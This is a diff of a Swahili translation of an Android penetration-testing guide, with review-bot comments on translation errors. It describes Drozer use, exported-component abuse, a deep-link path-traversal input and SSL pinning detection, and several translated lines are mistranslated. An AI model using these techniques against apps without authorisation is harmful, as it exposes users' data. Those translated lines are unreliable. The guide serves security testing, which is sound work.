- Tumia [**APKiD**](https://github.com/rednaga/APKiD) kuona compiler/packer/obfuscator gani ilitumika kujenga APK
### React Native Application
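Review bot: "data inayorekebishwa kutoka external storage" changes the meaning (that is data being modified); the replaced "data inayopatikana kutoka external storage" (data retrieved) is the correct reading of the advice to validate input. In the "Mambo mengine ya kuangalia" list, "Inapendekezwa **obfuscate the APK**" and "inapaswa **check it's own integrity before executing**" leave English fragments untranslated inside Swahili sentences (and "it's" should be "its"). Both the old and the new TIP lines also pair Android 4.4 with API 17; Android 4.4 is API level 19 (API 17 is Android 4.2), so that pairing should be corrected upstream as well.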
@ -197,17 +197,17 @@ Read the following page to learn how to easily access C# code of a xamarin appli
### Superpacked Applications
According to this [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked is a Meta algorithm that compress the content of an application into a single file. The blog talks about the possibility of creating an app that decompress these kind of apps... and a faster way which involves to **execute the application and gather the decompressed files from the filesystem.**
Kulingana na hii [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked ni Meta algorithm inayobana (compress) yaliyomo ya application ndani ya faili moja. Blog inaelezea uwezekano wa kuunda app inayoweza decompress aina hizi za apps... na njia ya haraka zaidi inayohusisha **execute the application and gather the decompressed files from the filesystem.**
### Automated Static Code Analysis
The tool [**mariana-trench**](https://github.com/facebook/mariana-trench) is capable of finding **vulnerabilities** by **scanning** the **code** of the application. This tool contains a series of **known sources** (that indicates to the tool the **places** where the **input** is **controlled by the user**), **sinks** (which indicates to the tool **dangerous** **places** where malicious user input could cause damages) and **rules**. These rules indicates the **combination** of **sources-sinks** that indicates a vulnerability.
The tool [**mariana-trench**](https://github.com/facebook/mariana-trench) ina uwezo wa kupatikana **vulnerabilities** kwa **scanning** ya **code** ya application. Zana hii ina safu ya **known sources** (zinazorambia zana maeneo ambapo **input** inadhibitiwa na user), **sinks** (zinazorambia zana maeneo hatari ambapo input ya mtumiaji mbaya inaweza kusababisha uharibifu) na **rules**. Rules hizi zinaonyesha **mchanganyiko** wa **sources-sinks** unaoashiria udiwani wa usalama.
With this knowledge, **mariana-trench will review the code and find possible vulnerabilities on it**.
Kwa uelewa huu, **mariana-trench itapitia code na kupata vulnerabilities zinazowezekana ndani yake**.
### Secrets leaked
An application may contain secrets (API keys, passwords, hidden urls, subdomains...) inside of it that you might be able to discover. You could us a tool such as [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
Application inaweza kuwa na secrets (API keys, passwords, hidden urls, subdomains...) ndani yake ambazo unaweza kugundua. Unaweza kutumia zana kama [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
### Bypass Biometric Authentication
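Review bot: "ina uwezo wa kupatikana **vulnerabilities**" uses the passive "kupatikana" (to be found) where the active "kupata" or "kutafuta" is meant; "zinazorambia zana" is not a word ("zinazoiambia zana", which tell the tool); and "udiwani wa usalama" should be "udhaifu wa usalama".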
@ -222,6 +222,11 @@ bypass-biometric-authentication-android.md
- **Send SMSs**: `sendTextMessage, sendMultipartTestMessage`
- **Native functions** declared as `native`: `public native, System.loadLibrary, System.load`
- [Read this to learn **how to reverse native functions**](reversing-native-libraries.md)
- In-memory native code execution via JNI (downloaded shellcode → mmap/mprotect → call):
{{#ref}}
in-memory-jni-shellcode-execution.md
{{#endref}}
### **Other tricks**
@ -234,56 +239,56 @@ content-protocol.md
---
## Dynamic Analysis
## Uchambuzi wa Dinamiki
> First of all, you need an environment where you can install the application and all the environment (Burp CA cert, Drozer and Frida mainly). Therefore, a rooted device (emulated or not) is extremely recommended.
> Kwanza kabisa, unahitaji mazingira ambapo unaweza kusanidi application na mazingira yote (Burp CA cert, Drozer na Frida hasa). Kwa hivyo, kifaa kilicho rooted (emulated au sio) kinapendekezwa sana.
### Online Dynamic analysis
You can create a **free account** in: [https://appetize.io/](https://appetize.io). This platform allows you to **upload** and **execute** APKs, so it is useful to see how an apk is behaving.
Unaweza kuunda **free account** kwenye: [https://appetize.io/](https://appetize.io). Jukwaa hili linakuwezesha **upload** na **execute** APKs, hivyo ni muhimu kuona jinsi apk inavyotendeka.
You can even **see the logs of your application** in the web and connect through **adb**.
Unaweza hata **kuona logs za application yako** kwenye wavuti na kuungana kupitia **adb**.
![](<../../images/image (831).png>)
Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emulators.
Shukrani kwa muunganisho wa ADB unaweza kutumia **Drozer** na **Frida** ndani ya emulators.
### Local Dynamic Analysis
#### Using an emulator
- [**Android Studio**](https://developer.android.com/studio) (You can create **x86** and **arm** devices, and according to [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** without needing an slow arm emulator).
- Learn to set it up in this page:
- [**Android Studio**](https://developer.android.com/studio) (Unaweza kuunda **x86** na **arm** devices, na kulingana na [**hii**](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** bila kuhitaji emulator ya arm ambayo ni polepole).
- Jifunze jinsi ya kuisanidi kwenye ukurasa huu:
{{#ref}}
avd-android-virtual-device.md
{{#endref}}
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(Free version:** Personal Edition, you need to create an account. _It's recommend to **download** the version **WITH**_ _**VirtualBox** to avoid potential errors._)
- [**Nox**](https://es.bignox.com) (Free, but it doesn't support Frida or Drozer).
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(Free version:** Personal Edition, utahitaji kuunda account. _Inapendekezwa **download** toleo **WITH** _**VirtualBox** ili kuepuka makosa yanayoweza kutokea._)
- [**Nox**](https://es.bignox.com) (Free, lakini haitegemei Frida au Drozer).
> [!TIP]
> When creating a new emulator on any platform remember that the bigger the screen is, the slower the emulator will run. So select small screens if possible.
> Unapotengeneza emulator mpya kwenye jukwaa lolote kumbuka kuwa skrini kubwa inafanya emulator kuwa polepole. Hivyo chagua skrini ndogo inapowezekana.
To **install google services** (like AppStore) in Genymotion you need to click on the red marked button of the following image:
Ili **install google services** (kama AppStore) kwenye Genymotion unahitaji kubofya kitufe kilicho alama nyekundu kwenye picha ifuatayo:
![](<../../images/image (277).png>)
Also, notice that in the **configuration of the Android VM in Genymotion** you can select **Bridge Network mode** (this will be useful if you will be connecting to the Android VM from a different VM with the tools).
Pia, kumbuka kwamba katika **configuration ya Android VM katika Genymotion** unaweza kuchagua **Bridge Network mode** (hii itakuwa muhimu ikiwa utakuwa unahitaji kuungana na Android VM kutoka VM tofauti yenye zana).
#### Use a physical device
Unahitaji kuwezesha chaguo za **debugging** na itakuwa vizuri kama utaweza kuziroot:
Unahitaji kuwasha options za **debugging** na itakuwa vizuri ikiwa unaweza kuiroot:
1. **Settings**.
2. (FromAndroid 8.0) Select **System**.
3. Select **About phone**.
4. Press **Build number** 7 times.
5. Go back and you will find the **Developer options**.
5. Rudi nyuma na utapata **Developer options**.
> Once you have installed the application, the first thing you should do is to try it and investigate what does it do, how does it work and get comfortable with it.\
> I will suggest to **perform this initial dynamic analysis using MobSF dynamic analysis + pidcat**, so we will be able to **learn how the application works** while MobSF **captures** a lot of **interesting** **data** you can review later on.
> Mara tu unapoweka application, jambo la kwanza unalopaswa kufanya ni kuifanyia majaribio na kuchunguza inafanya nini, inafanya kazi vipi na kufahamika nayo.\
> Ninapendekeza **fanya uchambuzi huu wa awali wa dinamik kwa kutumia MobSF dynamic analysis + pidcat**, hivyo tutakuwa na uwezo wa **kujifunza jinsi application inavyofanya kazi** wakati MobSF **inachukua** data nyingi **zazovutia** ambazo unaweza kupitia baadaye.
Magisk/Zygisk quick notes (recommended on Pixel devices)
- Patch boot.img with the Magisk app and flash via fastboot to get systemless root
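Review bot: L398 mistranslates "doesn't support Frida or Drozer": "haitegemei" means "does not depend on", which inverts the warning; use "haiungi mkono" (or "haisaidii") so readers do not pick Nox expecting Frida to work. Two smaller points in the same hunk: L419 has the typo "zazovutia" (should be "za kuvutia") and writes "dinamik" where L375 uses "Dinamiki", and L390 keeps the missing space between the link and "**latest x86**" from the source line L388, so the two render as one run; add a space after the closing parenthesis.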
@ -297,102 +302,102 @@ Magisk/Zygisk quick notes (recommended on Pixel devices)
**Logging**
Wdevelopers wanapaswa kuwa waangalifu kuhusu kufichua **debugging information** hadharani, kwa kuwa inaweza kusababisha data nyeti ku-leak. Vifaa kama [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kufuatilia logs za application ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendekezwa kwa urahisi wake na usomaji.
Watengenezaji wanapaswa kuwa waangalifu kuhusu kuonyesha **debugging information** hadharani, kwa kuwa inaweza kusababisha data nyeti ku-leak. Zana za [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kwa kusimamia logs za application ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendekezwa kwa urahisi wake wa matumizi na ufasaha wa kuonekana.
> [!WARNING]
> Note that from **later newer than Android 4.0**, **applications are only able to access their own logs**. So applications cannot access other apps logs.\
> Anyway, it's still recommended to **not log sensitive information**.
> Kumbuka kwamba tangu **toleo za baadaye za Android juu ya 4.0**, **applications zinaweza kupiga logs za programu zao tu**. Hivyo applications haziwezi kupata logs za apps nyingine.\
> Hata hivyo, bado inashauriwa **kuto-log taarifa nyeti**.
**Copy/Paste Buffer Caching**
Mfumo wa Android unaotegemea **clipboard** unaruhusu utendaji wa copy-paste ndani ya apps, lakini unaweka hatari kwani **apps zingine** zinaweza **access** clipboard, na hivyo kuweza ku-expose data nyeti. Ni muhimu **kuzima** vitendo vya copy/paste kwa sehemu nyeti za app, kama maelezo ya kadi za mkopo, ili kuzuia data ku-leak.
Mfumo wa Android unaotegemea **clipboard** unawezesha utendaji wa copy-paste katika apps, lakini una hatari kwani **applications nyingine** zinaweza **kupata** clipboard, na hivyo kuonyesha data nyeti. Ni muhimu **kuzima copy/paste** kwa sehemu nyeti za application, kama maelezo ya kadi za mkopo, ili kuzuia leak ya data.
**Crash Logs**
Kama application inakufa (crash) na **kuhifadhi logs**, logs hizi zinaweza kumsaidia attacker, hasa pale ambapo application haiwezi kureverse-engineered. Ili kupunguza hatari hii, epuka logging kwenye crash, na kama logs lazima zitumwe kwenye network, hakikisha zitatumwa kwa channel ya SSL kwa usalama.
Ikiwa application **inaanguka (crashes)** na **inahifadhi logs**, logs hizi zinaweza kumsaidia mshambuliaji, hasa pale application haiwezi ku-reverse-engineered. Ili kupunguza hatari hii, epuka ku-log wakati wa crashes, na kama logs lazima zitumwe mtandaoni, hakikisha zinatumwa kupitia channel ya SSL kwa usalama.
Kama pentester, **try to take a look to these logs**.
Kama pentester, **jaribu kuangalia logs hizi**.
**Analytics Data Sent To 3rd Parties**
Applications mara nyingi huingiza services kama Google Adsense, ambazo kwa utekelezaji mbaya zinaweza kwa bahati mbaya **leak sensitive data**. Ili kubaini potential data leaks, inashauriwa **kuintercept traffic ya application** na kuangalia kama taarifa nyeti zinatumwa kwa third-party services.
Applications mara nyingi hujumuisha huduma kama Google Adsense, ambazo kwa kutokukamilika kwa utekelezaji wa watengenezaji zinaweza kwa bahati mbaya leak sensitive data. Ili kubaini leak za data zinazowezekana, inashauriwa **kuingilia (intercept) trafiki ya application** na kuangalia kama kuna taarifa nyeti zinatumiwa kwenda kwa huduma za wa tatu.
### SQLite DBs
Most of the applications will use **internal SQLite databases** to save information. During the pentest take a **look** to the **databases** created, the names of **tables** and **columns** and all the **data** saved because you could find **sensitive information** (which would be a vulnerability).\
Databases should be located in `/data/data/the.package.name/databases` like `/data/data/com.mwr.example.sieve/databases`
Mara nyingi applications hutatumia **internal SQLite databases** kuhifadhi taarifa. Wakati wa pentest angalia **databases** zilizoundwa, majina ya **tables** na **columns** na data zote zilizohifadhiwa kwani unaweza kupata **taarifa nyeti** (ambayo itakuwa udhaifu).\
Databases zinapaswa kuwa katika `/data/data/the.package.name/databases` kama `/data/data/com.mwr.example.sieve/databases`
If the database is saving confidential information and is **encrypted b**ut you can **find** the **password** inside the application it's still a **vulnerability**.
Ikiwa database inahifadhi taarifa za siri na ime-**encrypted** lakini unaweza **kupata** password ndani ya application bado ni **udhaifu**.
Enumerate the tables using `.tables` and enumerate the columns of the tables doing `.schema <table_name>`
Orodhesha tables kwa kutumia `.tables` na orodhesha columns za tables kwa kufanya `.schema <table_name>`
### Drozer (Exploit Activities, Content Providers and Services)
From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** allows you to **assume the role of an Android app** and interact with other apps. It can do **anything that an installed application can do**, such as make use of Androids Inter-Process Communication (IPC) mechanism and interact with the underlying operating system. .\
Drozer is s useful tool to **exploit exported activities, exported services and Content Providers** as you will learn in the following sections.
From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** inakuwezesha kuchukua nafasi ya Android app na kuingiliana na apps nyingine. Inaweza kufanya chochote ambacho installed application inaweza kufanya, kama kutumia mfumo wa Androids Inter-Process Communication (IPC) na kuingiliana na operating system iliyopo. .\
Drozer ni zana muhimu ya **kuchukua faida ya exported activities, exported services na Content Providers** kama utakavyojifunza katika sehemu zilizofuata.
### Exploiting exported Activities
[**Read this if you want to refresh what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\
Also remember that the code of an activity starts in the **`onCreate`** method.
Pia kumbuka kwamba code ya activity inaanza katika method ya **`onCreate`**.
**Authorisation bypass**
When an Activity is exported you can invoke its screen from an external app. Therefore, if an activity with **sensitive information** is **exported** you could **bypass** the **authentication** mechanisms **to access it.**
Wakati Activity ime-exported unaweza kuitisha screen yake kutoka app ya nje. Kwa hivyo, ikiwa activity yenye **taarifa nyeti** ime-exported unaweza **bypass** mekanismo za **authentication** ili kufikia.
[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/index.html#activities)
You can also start an exported activity from adb:
Unaweza pia kuanza exported activity kutoka adb:
- PackageName is com.example.demo
- Exported ActivityName is com.example.test.MainActivity
```bash
adb shell am start -n com.example.demo/com.example.test.MainActivity
```
**NOTE**: MobSF itakutambua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika activity, lakini kutokana na [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hii ni hatari tu kwenye toleo la zamani (API versions < 21).
**NOTE**: MobSF will detect as malicious the use of _**singleTask/singleInstance**_ as `android:launchMode` in an activity, but due to [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), apparently this is only dangerous on old versions (API versions < 21).
> [!TIP]
> Kumbuka kwamba authorisation bypass siyo kila wakati ni vulnerability; itategemea jinsi bypass inavyofanya kazi na ni taarifa gani zinazoonekana.
> Kumbuka kwamba authorisation bypass siyo kila mara ni vulnerability; itategemea jinsi bypass inavyofanya kazi na ni taarifa gani zinazoonyeshwa.
**Sensitive information leakage**
**Activities can also return results**. Ikiwa utafanikiwa kupata exported na unprotected activity inayoitisha method ya **`setResult`** na **kurudisha sensitive information**, kuna sensitive information leakage.
**Activities pia zinaweza kurudisha matokeo**. Ikiwa utaweza kupata activity iliyokuwa exported na isiyolindwa ikitumia method ya **`setResult`** na **kurudisha sensitive information**, kuna sensitive information leakage.
#### Tapjacking
If tapjacking isn't prevented, unaweza kudharau exported activity kufanya **user perform unexpected actions**. Kwa habari zaidi kuhusu [**what is Tapjacking follow the link**](#tapjacking).
Ikiwa Tapjacking haizuizwi, unaweza kutumia exported activity kusababisha **mtumiaji afanye vitendo visivyotarajiwa**. Kwa maelezo zaidi kuhusu [**what is Tapjacking follow the link**](#tapjacking).
### Exploiting Content Providers - Kufikia na kusimamia sensitive information
### Exploiting Content Providers - Accessing and manipulating sensitive information
[**Read this if you want to refresh what is a Content Provider.**](android-applications-basics.md#content-provider)\
Content providers kwa kawaida hutumika kushiriki data. Ikiwa app ina content providers zinapatikana unaweza kuwa na uwezo wa **extract sensitive** data kutoka kwao. Pia ni muhimu kujaribu uwezekano wa **SQL injections** na **Path Traversals** kwani zinaweza kuwa vulnerable.
[**Read this if you want to refresh what is a Content Provider.**](android-applications-basics.md#content-provider)
Content providers kwa msingi hutumiwa **kushiriki data**. Ikiwa app ina content providers zinapatikana unaweza kuwa na uwezo wa **kutoa data nyeti** kutoka kwao. Pia ni vyema kujaribu uwezekano wa **SQL injections** na **Path Traversals**, kwa sababu vinaweza kuwa dhaifu.
[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/index.html#content-providers)
### **Exploiting Services**
[**Read this if you want to refresh what is a Service.**](android-applications-basics.md#services)\
Kumbuka kwamba vitendo vya Service huanza katika method `onStartCommand`.
[**Read this if you want to refresh what is a Service.**](android-applications-basics.md#services)
Kumbuka kwamba vitendo vya Service huanza kwenye method `onStartCommand`.
Service kwa msingi ni kitu kinachoweza kupokea data, kuichakata na kurudisha (au la) response. Kwa hiyo, ikiwa application ina exporting services unapaswa kuangalia code ili kuelewa inafanya nini na kuipima kwa dynamically ili kutoa taarifa za siri, kupita vikwazo vya uthibitishaji...
Service kwa msingi ni kitu kinachoweza **kupokea data**, **kuchakata** na **kurudisha** (au la) majibu. Hivyo, ikiwa application ina services zilizochapishwa (exporting) unapaswa **kagua** **code** ili kuelewa inafanya nini na **iteste** kwa njia ya **dynamic** kwa lengo la kupata taarifa za siri, bypassing authentication measures...
[**Learn how to exploit Services with Drozer.**](drozer-tutorial/index.html#services)
### **Exploiting Broadcast Receivers**
[**Read this if you want to refresh what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\
Kumbuka kwamba vitendo vya Broadcast Receiver huanza katika method `onReceive`.
[**Read this if you want to refresh what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)
Kumbuka kwamba vitendo vya Broadcast Receiver huanza kwenye method `onReceive`.
Broadcast receiver itakuwa inasubiri aina ya ujumbe. Kulingana na jinsi receiver inavyoshughulikia ujumbe inaweza kuwa vulnerable.\
Broadcast receiver itakuwa inasubiri aina fulani ya ujumbe. Kutegemea jinsi receiver inavyoshughulikia ujumbe huo inaweza kuwa dhaifu.
[**Learn how to exploit Broadcast Receivers with Drozer.**](#exploiting-broadcast-receivers)
### **Exploiting Schemes / Deep links**
Unaweza kutafuta deep links manually, kwa kutumia tools kama MobSF au scripts kama [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
Unaweza **open** declared **scheme** kwa kutumia **adb** au **browser**:
Unaweza kutafuta deep links kwa mkono, ukitumia tools kama MobSF au scripts kama [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).
Unaweza **fungua** scheme iliyotangazwa kwa kutumia **adb** au **browser**:
```bash
adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" [your.package.name]
```
_Tambua kwamba unaweza **kuacha jina la kifurushi** na simu ya rununu itaita moja kwa moja app inayofaa kufungua kiungo hicho._
_Kumbuka kwamba unaweza **omit the package name** na kifaa cha rununu kitaita moja kwa moja app itakayofungua link hiyo._
```html
<!-- Browser regular link -->
<a href="scheme://hostname/path?param=value">Click me</a>
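Review bot: L429 renders "applications are only able to access their own logs" as "zinaweza kupiga logs za programu zao tu"; "kupiga" means "hit", so the sentence no longer says what the English L427 says. Suggest "applications zinaweza kufikia logs zao tu", and worth confirming the version while here: the READ_LOGS restriction this note describes is generally dated to Android 4.1 (Jelly Bean), so "juu ya 4.0" is loose at best. Also in this hunk: the pairs at L471/L472, L482/L483, L527/L528 and L533/L534 each place a Swahili line next to an English line; if the English side is the one being added, this translation commit reverts earlier translations of the MobSF launchMode note and of three headings, which should be checked. Minor: L445 "hutatumia" should be "hutumia", and L462 ends with "ili kufikia." without an object ("ili kuifikia").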
@ -401,56 +406,56 @@ _Tambua kwamba unaweza **kuacha jina la kifurushi** na simu ya rununu itaita moj
```
**Msimbo unaotekelezwa**
Ili kupata **msimbo utakaotekelezwa katika App**, nenda kwenye activity inayoitwa na the deeplink na tafuta function **`onNewIntent`**.
Ili kupata **msimbo utakao endeshwa katika App**, nenda kwa activity inayoitwa na deeplink na tafuta function **`onNewIntent`**.
![](<../../images/image (436) (1) (1) (1).png>)
**Taarifa nyeti**
Kila unapokutana na deep link hakikisha kwamba **haipokei data nyeti (kama passwords) kupitia vigezo vya URL**, kwa sababu programu nyingine yoyote inaweza **kuiga deep link na kuiba data hiyo!**
Kila unapokutana na deep link hakikisha kwamba **haina kupokea data nyeti (kama passwords) kupitia URL parameters**, kwa sababu programu nyingine yoyote inaweza **kuiga deep link na kuiba data hiyo!**
**Vigezo katika path**
**Parameters in path**
Unapaswa pia **kuhakiki kama deep link yoyote inatumia parameter ndani ya path** ya URL kama: `https://api.example.com/v1/users/{username}` , katika hali hiyo unaweza kulazimisha path traversal kwa kufikia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
Kumbuka kwamba ukipata endpoints sahihi ndani ya application unaweza kusababisha **Open Redirect** (ikiwa sehemu ya path inatumika kama domain name), **account takeover** (ikiwa unaweza kubadilisha maelezo ya watumiaji bila CSRF token na endpoint iliyo na udhaifu ilitumia method sahihi) na udhaifu mwingine wowote. Habari zaidi [hapa](http://dphoeniixx.com/2020/12/13-2/).
Unapaswa pia kuangalia kama deep link yoyote inatumia parameter ndani ya path ya URL kama: `https://api.example.com/v1/users/{username}` , katika kesi hiyo unaweza kulazimisha path traversal kwa kufikia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
Kumbuka kwamba ikiwa utapata endpoints sahihi ndani ya application unaweza kusababisha **Open Redirect** (ikiwa sehemu ya path inatumika kama domain name), **account takeover** (ikiwa unaweza kubadilisha maelezo ya watumiaji bila CSRF token na endpoint iliyo vuln ilitumia method sahihi) na aina nyingine yoyote ya vuln. Taarifa zaidi kuhusu hili [hapa](http://dphoeniixx.com/2020/12/13-2/).
**Mifano zaidi**
**More examples**
Ripoti ya bug bounty yenye kuvutia: [https://hackerone.com/reports/855618](https://hackerone.com/reports/855618) kuhusu links (_/.well-known/assetlinks.json_).
Ripoti ya bug bounty ya kuvutia: [hapa](https://hackerone.com/reports/855618) kuhusu links (_/.well-known/assetlinks.json_).
### Ukaguzi wa Transport Layer na Kushindwa kwa Uthibitishaji
### Ukaguzi wa Transport Layer na Makosa ya Uthibitishaji
- **Vyeti mara nyingi havikaguliwi ipasavyo** na applications za Android. Ni kawaida kwa applications hizi kupuuza onyo na kukubali self-signed certificates au, katika baadhi ya matukio, kurudi kutumia HTTP connections.
- **Mazungumzo wakati wa SSL/TLS handshake mara nyingine huwa dhaifu**, kwa kutumia insecure cipher suites. Udhaifu huu unafanya muunganisho uwe hatarini kwa man-in-the-middle (MITM) attacks, ukiruhusu wadukuzi kufungua encryption ya data.
- **Leakage of private information** ni hatari wakati applications zinathibitisha kwa kutumia channels salama lakini kisha zinasiliana kwa channels zisizo salama kwa ajili ya miamala mingine. Njia hii inashindwa kulinda data nyeti, kama session cookies au maelezo ya watumiaji, dhidi ya kukamatwa na wahalifu.
- **Vyeti hazichunguzwi kila mara ipasavyo** na applications za Android. Ni kawaida kwa applications hizi kupuuza onyo na kukubali self-signed certificates au, katika matukio mengine, kurudi kutumia HTTP connections.
- **Mazungumzo wakati wa SSL/TLS handshake wakati mwingine huwa dhaifu**, zikitumia insecure cipher suites. Udhurumvu huu unafanya connection kuwa nyeti kwa man-in-the-middle (MITM) attacks, kuruhusu attackers kufungua data.
- **Leakage of private information** ni hatari wakati applications zinathibitisha kwa kutumia secure channels lakini kisha kuwasiliana kupitia non-secure channels kwa miamala mingine. Njia hii inashindwa kulinda data nyeti, kama session cookies au maelezo ya mtumiaji, dhidi ya interception na entities zenye nia mbaya.
#### Uhakiki wa vyeti
#### Uthibitishaji wa Cheti
Tutatilia maanani **certificate verification**. Uadilifu wa certificate ya server lazima uthibitishwe ili kuongeza usalama. Hii ni muhimu kwa sababu TLS configurations zisizo salama na uhamishaji wa data nyeti kupitia channels zisizo encrypted vinaweza kuleta hatari kubwa. Kwa hatua za kina juu ya jinsi ya kuthibitisha server certificates na kushughulikia udhaifu, rasilimali hii [**inatoa mwanga**](https://manifestsecurity.com/android-application-security-part-10/).
Tutazingatia **certificate verification**. Lazima integrity ya cheti cha server ithibitishwe ili kuongeza usalama. Hii ni muhimu kwa sababu konfigurishaji zisizo salama za TLS na uwasilishaji wa data nyeti kupitia channels zisizosimbwa zinaweza kuleta hatari kubwa. Kwa hatua za kina za kuthibitisha vyeti vya server na kushughulikia udhaifu, [**rasilimali hii**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo kamili.
#### SSL Pinning
SSL Pinning ni tahadhari ya usalama ambapo application inathibitisha certificate ya server dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya application yenyewe. Mbinu hii ni muhimu kuzuia MITM attacks. Kutekeleza SSL Pinning kunashauriwa kwa nguvu kwa applications zinazosimamia taarifa nyeti.
SSL Pinning ni hatua ya usalama ambapo application inathibitisha cheti ya server dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya application yenyewe. Njia hii ni muhimu kwa kuzuia MITM attacks. Kutekeleza SSL Pinning kunapendekezwa kwa nguvu kwa applications zinashughulikia taarifa nyeti.
#### Ukaguzi wa Traffic
#### Traffic Inspection
Ili kuchambua HTTP traffic, ni lazima **usakinishe certificate ya chombo cha proxy** (mfano, Burp). Bila kusakinisha certificate hii, traffic iliyosimbwa inaweza isionewe kupitia proxy. Kwa mwongozo wa jinsi ya kusakinisha custom CA certificate, [**bofya hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Ili kuchunguza HTTP traffic, ni lazima **uishe cheti cha proxy tool** (mfano, Burp). Bila kuisakinisha cheti hiki, trafiki iliyosimbwa inaweza isionekane kupitia proxy. Kwa mwongozo wa kusakinisha custom CA certificate, [**bonyeza hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Applications zinazolenga **API Level 24 and above** zinahitaji mabadiliko kwenye Network Security Config ili kukubali CA certificate ya proxy. Hatua hii ni muhimu kwa kuchambua traffic iliyosimbwa. Kwa maelekezo ya jinsi ya kubadilisha Network Security Config, [**rejea mwongozo huu**](make-apk-accept-ca-certificate.md).
Applications zinazolenga **API Level 24 and above** zinahitaji marekebisho ya Network Security Config ili kukubali CA certificate ya proxy. Hatua hii ni muhimu kwa kuchunguza trafiki iliyosimbwa. Kwa maelekezo ya kubadilisha Network Security Config, [**rejea tutorial hii**](make-apk-accept-ca-certificate.md).
Ikiwa **Flutter** inatumika unahitaji kufuata maelekezo kwenye [**ukurasa huu**](flutter.md). Hii ni kwa sababu, kuongeza certificate kwenye store peke yake haitafanya kazi kwani Flutter ina orodha yake ya CAs zinazokubalika.
Ikiwa **Flutter** inatumiwa unahitaji kufuata maelekezo katika [**ukurasa huu**](flutter.md). Hii ni kwa sababu, kuongeza tu cheti kwenye store haitafanya kazi kwani Flutter ina orodha yake ya valid CAs.
#### Utambuzi wa static wa SSL/TLS pinning
#### Ugunduzi wa statiki wa SSL/TLS pinning
Kabla ya kujaribu runtime bypasses, panga haraka maeneo ambapo pinning inatekelezwa katika APK. Utambuzi wa static utakusaidia kupanga hooks/patches na kuzingatia code paths sahihi.
Kabla ya kujaribu runtime bypasses, chora haraka ni wapi pinning inatekelezwa ndani ya APK. Ugunduzi wa statiki hukusaidia kupanga hooks/patches na kuzingatia code paths sahihi.
Tool: SSLPinDetect
- Open-source static-analysis utility inayofanya decompile ya APK hadi Smali (kupitia apktool) na kutafuta curated regex patterns za utekelezaji wa SSL/TLS pinning.
- Inaripoti path ya faili kwa usahihi, nambari ya mstari, na kipande cha code kwa kila match.
- Inafunika frameworks za kawaida na code paths za custom: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, na Network Security Config XML pins.
- Open-source utiliti ya uchambuzi wa statiki inayodecompile APK hadi Smali (via apktool) na kutafuta pattern za regex zilizotengwa za utekelezaji wa SSL/TLS pinning.
- Inaripoti path sahihi ya faili, nambari ya mstari, na kipande cha code kwa kila match.
- Inashughulikia frameworks za kawaida na custom code paths: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, and Network Security Config XML pins.
Sakinisha
- Masharti ya awali: Python >= 3.8, Java on PATH, apktool
Install
- Mahitaji ya awali: Python >= 3.8, Java on PATH, apktool
```bash
git clone https://github.com/aancw/SSLPinDetect
cd SSLPinDetect
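Review bot: two new lines introduce wrong words: L543 "Udhurumvu huu" should be "Udhaifu huu" (the term used at L540), and L555 "ni lazima uishe cheti cha proxy tool" should be "ni lazima usakinishe cheti cha proxy tool" ("uishe" does not mean install, and this sentence is the one instruction a reader needs before any HTTPS can be intercepted). L526 also regresses the grammar of L525: "haina kupokea data nyeti" is ungrammatical where "haipokei data nyeti" was correct. Minor: L552/L553 is another Swahili-next-to-English heading pair; check which side is being added.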
@ -464,9 +469,8 @@ python sslpindetect.py -f app.apk -a apktool.jar
# Verbose (timings + per-match path:line + snippet)
python sslpindetect.py -a apktool_2.11.0.jar -f sample/app-release.apk -v
```
Mifano ya sheria za muundo (JSON)
Tumia au panua signatures ili kugundua proprietary/custom pinning styles. Unaweza kupakia JSON yako mwenyewe na kutafuta kwa wingi.
Mfano wa kanuni za pattern (JSON)
Tumia au ongeza signatures ili kugundua proprietary/custom pinning styles. Unaweza kupakia JSON yako mwenyewe na scan kwa wingi.
```json
{
"OkHttp Certificate Pinning": [
@ -481,42 +485,42 @@ Tumia au panua signatures ili kugundua proprietary/custom pinning styles. Unawez
}
```
